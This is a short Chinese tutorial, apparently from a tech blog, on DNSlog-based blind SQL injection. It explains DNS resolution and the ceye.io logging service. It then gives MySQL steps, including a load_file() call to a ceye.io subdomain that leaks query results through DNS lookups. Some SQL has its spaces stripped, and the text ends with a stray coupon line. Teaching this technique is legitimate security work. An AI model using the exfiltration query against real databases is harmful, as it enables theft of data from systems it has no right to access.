1.什么是DNS在Internet上域名与IP地址之间是一对一(或者多对一)的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,域名解析需要由专门的域名解析服务器来完成,DNS就是进行域名解析的服务器。
用法也很简单,只要有账户,便会给你提供一个二级域名XXX.ceye.io,我们只要将信息放在三级域名那就可以收到信息了。我们只需要下图在红框出写入我们的SQL查询语句,查询的结果就会显示在DNSlog平台的日志里。
注:1红框类容不能含有特殊字符2目标服务器必须是windows服务器(3.就以sql盲注为例。深入理解下DNSlog注入过程:通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。showvariableslike'%secure%';查看load_file()可以读取的磁盘。1、当secure_file_priv为空,就可以读取磁盘的目录。
通过设置my.ini来配置。secure_file_priv=
在mysql命令行执行:selectload_file('\\afanti.wvax23.ceye.io\aaa');其中afanti就是要注入的查询语句查看平台,dnsLog被记录下来。
load_file()函数可以通过dns解析请求。
查看dnslog日志,发现security数据库被查询出来:
领取专属 10元无门槛券
私享最新 技术干货